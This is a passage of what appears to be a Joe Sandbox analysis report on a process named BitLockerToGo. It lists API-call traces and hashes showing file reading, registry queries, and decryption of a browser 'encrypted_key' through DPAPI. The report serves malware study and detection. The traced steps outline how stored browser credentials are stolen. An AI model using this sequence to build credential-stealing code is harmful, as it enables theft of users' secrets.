                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2623679115-0
                                                                                                                                                                • Opcode ID: 1a36c9e26ab6806ff02dfd13366ecc2368e0ad1329aaea3f4dd1ad82060872ac
                                                                                                                                                                • Instruction ID: e20c10be14b8b4cbc902534d9abd9f0c1c5aa379fc48c305431b718c63ece722
                                                                                                                                                                • Opcode Fuzzy Hash: 1a36c9e26ab6806ff02dfd13366ecc2368e0ad1329aaea3f4dd1ad82060872ac
                                                                                                                                                                • Instruction Fuzzy Hash: 4B41ABBED40208ABDB24FBE0FC49FED777DA788300F008558A6155B1C4EB755B988B91
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                • LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2311089104-0
                                                                                                                                                                • Opcode ID: eca63befe5a32d8361cad76f250568647187bcb7ae678839deb0d0175804423e
                                                                                                                                                                • Instruction ID: 123f0d7920c34e1bc91a263b1da94aeaf08fefec770ab15605a3d5b667d5b535
                                                                                                                                                                • Opcode Fuzzy Hash: eca63befe5a32d8361cad76f250568647187bcb7ae678839deb0d0175804423e
                                                                                                                                                                • Instruction Fuzzy Hash: 76312B78A01209EFEB14DF94D989BAEB7F5FF49350F108158E901AB2D0D774A941CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(?,03556270), ref: 030147DB
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014801
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03014820
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03014834
                                                                                                                                                                • lstrcat.KERNEL32(?,035506C0), ref: 03014847
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0301485B
                                                                                                                                                                • lstrcat.KERNEL32(?,035558B0), ref: 0301486F
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 03018D90: GetFileAttributesA.KERNEL32(00000000,?,03010117,?,00000000,?,00000000,03020DAB,03020DAA), ref: 03018D9F
                                                                                                                                                                  • Part of subcall function 03014570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 03014580
                                                                                                                                                                  • Part of subcall function 03014570: RtlAllocateHeap.NTDLL(00000000), ref: 03014587
                                                                                                                                                                  • Part of subcall function 03014570: wsprintfA.USER32 ref: 030145A6
                                                                                                                                                                  • Part of subcall function 03014570: FindFirstFileA.KERNEL32(?,?), ref: 030145BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2540262943-0
                                                                                                                                                                • Opcode ID: 4d63c40b269bea59d19a8939fe774327d863688845617cc518b0dcf3ff3bcb98
                                                                                                                                                                • Instruction ID: 40a14aac0ce5053bdb209b81607ae14d09eb23b9986c596799ec4effbe810b33
                                                                                                                                                                • Opcode Fuzzy Hash: 4d63c40b269bea59d19a8939fe774327d863688845617cc518b0dcf3ff3bcb98
                                                                                                                                                                • Instruction Fuzzy Hash: C23184BAD4130897DB14F7B0EC88EDD737CAB88704F448589F3159A084EB7497998B91
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0300123E
                                                                                                                                                                • __aulldiv.LIBCMT ref: 03001258
                                                                                                                                                                • __aulldiv.LIBCMT ref: 03001266
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03001294
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 3404098578-2766056989
                                                                                                                                                                • Opcode ID: b3a73a8c2b7af1265022a38f42300e8ab44da388ab16a7bd56b124f1033f4da4
                                                                                                                                                                • Instruction ID: baf26bd17701a061df941858a3a33e7986d39236a420958ff795dc4b8ff6697d
                                                                                                                                                                • Opcode Fuzzy Hash: b3a73a8c2b7af1265022a38f42300e8ab44da388ab16a7bd56b124f1033f4da4
                                                                                                                                                                • Instruction Fuzzy Hash: 810186B4D86308FBEB14DBD4DC49B9DB778AB44701F248044F705BB1C0D77495518759
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 030099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                  • Part of subcall function 030099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                  • Part of subcall function 030099C0: LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                  • Part of subcall function 030099C0: ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                  • Part of subcall function 030099C0: LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                  • Part of subcall function 030099C0: CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                  • Part of subcall function 03018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 03009D39
                                                                                                                                                                  • Part of subcall function 03009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009AEF
                                                                                                                                                                  • Part of subcall function 03009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,03004EEE,00000000,?), ref: 03009B01
                                                                                                                                                                  • Part of subcall function 03009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009B2A
                                                                                                                                                                  • Part of subcall function 03009AC0: LocalFree.KERNEL32(?,?,?,?,03004EEE,00000000,?), ref: 03009B3F
                                                                                                                                                                • memcmp.MSVCRT(?,DPAPI,00000005), ref: 03009D92
                                                                                                                                                                  • Part of subcall function 03009B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 03009B84
                                                                                                                                                                  • Part of subcall function 03009B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 03009BA3
                                                                                                                                                                  • Part of subcall function 03009B60: memcpy.MSVCRT(?,?,?), ref: 03009BC6
                                                                                                                                                                  • Part of subcall function 03009B60: LocalFree.KERNEL32(?), ref: 03009BD3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                                                                                • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                • API String ID: 3731072634-738592651
                                                                                                                                                                • Opcode ID: 3291654ded47aa72deea8fa329f82f5c039596ca90b29e1522f57d04b593b041
                                                                                                                                                                • Instruction ID: c4c9291783720ed7c8eb4272adc106026d38419fe38df0fc6675775a353d577d
                                                                                                                                                                • Opcode Fuzzy Hash: 3291654ded47aa72deea8fa329f82f5c039596ca90b29e1522f57d04b593b041
                                                                                                                                                                • Instruction Fuzzy Hash: 533174B5D01208ABDF04EFE4DC85EEFB7B9BF48304F144519E911AB281E7349A14CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 6CC8C947
                                                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC8C969
                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 6CC8C9A9
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC8C9C8
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC8C9E2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4191843772-0
                                                                                                                                                                • Opcode ID: 7f9c571ce6dda71bfd17bfcd31478ce953cb762e36ae392acee07701271aaaf9
                                                                                                                                                                • Instruction ID: 6190d2567f5c6f999a9f22efe5a0f44bb85ef3d2ed08ce8d98a790172b78f3f2
                                                                                                                                                                • Opcode Fuzzy Hash: 7f9c571ce6dda71bfd17bfcd31478ce953cb762e36ae392acee07701271aaaf9
                                                                                                                                                                • Instruction Fuzzy Hash: 4A21C5327426146BDB04AF65E888BAF76B9FF46709F50025AF917A7A40FB605C0487A1
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 03017E37
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03017E3E
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,03551230,00000000,00020119,?), ref: 03017E5E
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,03555970,00000000,00000000,000000FF,000000FF), ref: 03017E7F
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 03017E92
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3225020163-0
                                                                                                                                                                • Opcode ID: d70d6ed18108f476b7397f00f9b0b143f4d25a9867fc9826adcaca58aec8c67b
                                                                                                                                                                • Instruction ID: da56fe5c6bf95f9e3b0675eea83ae9cf83de47cc32a7c9206718051b7a4810a8
                                                                                                                                                                • Opcode Fuzzy Hash: d70d6ed18108f476b7397f00f9b0b143f4d25a9867fc9826adcaca58aec8c67b
                                                                                                                                                                • Instruction Fuzzy Hash: 09115EB5A80209EBD710DF94E94AFBFBBFCFB08B10F108119F615A7284D77458008BA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 030012B4
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 030012BB
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 030012D7
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 030012F5
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 030012FF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3225020163-0
                                                                                                                                                                • Opcode ID: 13557c6a874f8b5785f4fba4394cd1c8c01abf5584176bff2239392b47b796b7
                                                                                                                                                                • Instruction ID: 24b101aa269ba1a0e73771503c4659a869cc42fdd0a24e4a198cdc6b0eed558a
                                                                                                                                                                • Opcode Fuzzy Hash: 13557c6a874f8b5785f4fba4394cd1c8c01abf5584176bff2239392b47b796b7
                                                                                                                                                                • Instruction Fuzzy Hash: B401E1BDA40208BBDB14DFE4E94DFAEB7BCEB48705F108159FA0597284D7759A018F50
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(03554EB0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,03010153), ref: 0300A0BD
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555750,?,?,?,?,?,?,?,?,?,?,?,03010153), ref: 0300A146
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
